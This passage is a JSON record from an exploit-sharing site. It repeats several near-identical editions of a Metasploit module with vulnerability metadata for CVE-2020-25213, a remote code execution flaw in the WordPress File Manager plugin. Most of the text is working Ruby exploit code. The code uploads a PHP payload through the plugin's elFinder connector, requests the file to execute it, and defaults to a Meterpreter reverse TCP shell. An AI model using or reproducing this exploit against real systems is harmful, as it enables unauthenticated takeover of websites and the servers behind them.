elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-07] #", "category": "", "verified": false}, "lastseen": "2021-10-06T21:18:33", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "adb4cd5567dced28336b0764232c5a83", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-08T00:32:31", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-08] #", "category": "", "verified": false}, "lastseen": "2021-10-08T00:32:31", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "7d302b659a7e3867f2a3b2ee169df267", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-08T22:23:30", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-09] #", "category": "", "verified": false}, "lastseen": "2021-10-08T22:23:30", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a924a97da9b09145dc3451347d6c4995", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-09T22:20:12", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-10] #", "category": "", "verified": false}, "lastseen": "2021-10-09T22:20:12", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "1376f85769b3831775b1ceb1b76891ae", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-11T00:18:45", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-11T00:18:45", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-11T00:18:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n 